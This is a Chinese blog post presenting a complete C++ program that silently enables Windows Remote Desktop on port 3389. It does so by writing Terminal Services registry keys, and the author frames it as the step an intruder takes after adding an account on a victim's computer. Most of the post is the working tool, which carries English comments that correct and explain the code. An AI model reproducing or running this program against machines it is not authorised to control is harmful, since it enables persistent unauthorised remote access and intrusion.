• 安全之路 —— C/C++开3389端口(远程终端)


    简介

    在渗透测试中开启对方电脑的3389端口是入侵者加入对方计算机账户后要想直接控制对方计算机的必要步骤,即开启对方计算机的远程终端功能,不同的Windows系统要开启3389需要修改不同的注册表项,为了方便,我们直接添加所有可能的注册表项,其中Windows 2000电脑需要重启激活,本程序并未添加此功能,需要的可参考笔者之前的博文:C/C++控制Windows关机/注销/重启的正确姿势。最后,要想关闭自己电脑的3389端口,可参考:关闭3389端口的方法

    注:本文在注册表资料上参考了《非安全》编辑部出版的《Hack编程实例精讲》系列书籍以及部分网络资料,在此致谢。

    C++代码样例

    #include <cstdio>
    #include <cstdlib>
    #include <cstring>
    #include <iostream>
    #include <windows.h>
    
    using namespace std;
    
    //封装字符型注册表操作
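    // Writes a REG_SZ value under hRoot\szSubKey, creating the subkey when it
    // does not exist yet.
    //
    // hRoot is borrowed from the caller (in this file always a predefined key
    // such as HKEY_LOCAL_MACHINE) and is NOT closed here; the original closed
    // it, which would invalidate a handle the caller still owns. The subkey
    // handle opened by this function is closed on every path, including the
    // RegSetValueEx failure path that previously leaked it.
    //
    // Returns TRUE on success, FALSE when any argument is NULL, the subkey
    // cannot be created/opened, or the value cannot be written.
    BOOL setStringValueToReg(HKEY hRoot, const char* szSubKey, const char* szValueName, const char* szValue)
    {
        if (szSubKey == NULL || szValueName == NULL || szValue == NULL) return FALSE;

        HKEY hKey = NULL;
        // Explicit ANSI entry points: the char* arguments only match the
        // generic RegCreateKeyEx/RegSetValueEx macros when UNICODE is not
        // defined. KEY_SET_VALUE is the only right this function exercises;
        // KEY_ALL_ACCESS asked for far more than is used.
        LONG lRet = RegCreateKeyExA(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
                                    KEY_SET_VALUE, NULL, &hKey, NULL);
        if (lRet != ERROR_SUCCESS) return FALSE;

        // For REG_SZ, cbData must include the terminating NUL; strlen() alone
        // stored an unterminated string.
        const DWORD cbData = static_cast<DWORD>(strlen(szValue) + 1);
        lRet = RegSetValueExA(hKey, szValueName, 0, REG_SZ,
                              reinterpret_cast<const BYTE*>(szValue), cbData);

        RegCloseKey(hKey);
        return (lRet == ERROR_SUCCESS) ? TRUE : FALSE;
    }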
    
    //封装数值型(DWORD)注册表操作
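    // Writes a REG_DWORD value under hRoot\szSubKey, creating the subkey when
    // it does not exist yet.
    //
    // hRoot is borrowed from the caller and is NOT closed here (the original
    // closed it, which would invalidate a handle the caller still owns). The
    // subkey handle opened by this function is closed on every path, including
    // the RegSetValueEx failure path that previously leaked it.
    //
    // szValue: the DWORD to store (the name is kept for call-site
    // compatibility even though it is not a string).
    // Returns TRUE on success, FALSE when an argument is NULL, the subkey
    // cannot be created/opened, or the value cannot be written.
    BOOL setDWORDValueToReg(HKEY hRoot, const char* szSubKey, const char* szValueName, DWORD szValue)
    {
        if (szSubKey == NULL || szValueName == NULL) return FALSE;

        HKEY hKey = NULL;
        // Explicit ANSI entry points so the char* arguments compile regardless
        // of UNICODE; KEY_SET_VALUE is the only right this function exercises.
        LONG lRet = RegCreateKeyExA(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
                                    KEY_SET_VALUE, NULL, &hKey, NULL);
        if (lRet != ERROR_SUCCESS) return FALSE;

        lRet = RegSetValueExA(hKey, szValueName, 0, REG_DWORD,
                              reinterpret_cast<const BYTE*>(&szValue), sizeof(DWORD));

        RegCloseKey(hKey);
        return (lRet == ERROR_SUCCESS) ? TRUE : FALSE;
    }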
    
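    // Entry point. Writes the Terminal Services / Remote Desktop registry
    // values listed below under HKEY_LOCAL_MACHINE and HKEY_USERS. Writing
    // these keys requires administrative rights; none of the command-line
    // parameters are used.
    //
    // Every write is checked and all of them are attempted even if an earlier
    // one fails. The process exit code is 0 only when every write succeeded
    // and 1 otherwise, so a caller can tell that something was skipped; the
    // original discarded every return value and always exited with 0.
    int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
    {
        (void)hInstance;
        (void)hPrevInstance;
        (void)lpCmdLine;
        (void)nShowCmd;

        // Listener port; 0x0d3d == 3389, the RDP default. Change here to use
        // another port.
        const DWORD PORT = 0x00000d3d;

        // Registry paths must be written with "\\": a single backslash in a
        // C++ string literal starts an escape sequence, so the original
        // "Windows\netcache", "Wds\rdpwd\Tds\tcp" and friends contained '\n',
        // '\r' and '\t' characters and named keys that do not exist.
        bool ok = true;
        if (!setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache", "Enabled", "0")) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", "EnableAdminTSRemote", 0x00000001)) ok = false;
        if (!setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "ShutdownWithoutLogon", "0")) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "TSEnabled", 0x00000001)) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\TermDD", "Start", 0x00000002)) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\TermService", "Start", 0x00000002)) ok = false;
        // The author sets fDenyTSConnections to 1 here and clears it again as
        // the last Terminal Server write below; that order is preserved.
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "fDenyTSConnections", 0x00000001)) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\RDPTcp", "PortNumber", PORT)) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp", "PortNumber", PORT)) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp", "PortNumber", PORT)) ok = false;
        if (!setDWORDValueToReg(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "fDenyTSConnections", 0x00000000)) ok = false;
        if (!setStringValueToReg(HKEY_USERS, ".DEFAULT\\Keyboard Layout\\Toggle", "Hotkey", "2")) ok = false;

        // Plain return instead of ExitProcess(0): the original's `return 0`
        // after ExitProcess was unreachable, and returning lets normal
        // process shutdown run.
        return ok ? 0 : 1;
    }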
  • 原文地址:https://www.cnblogs.com/csnd/p/12897016.html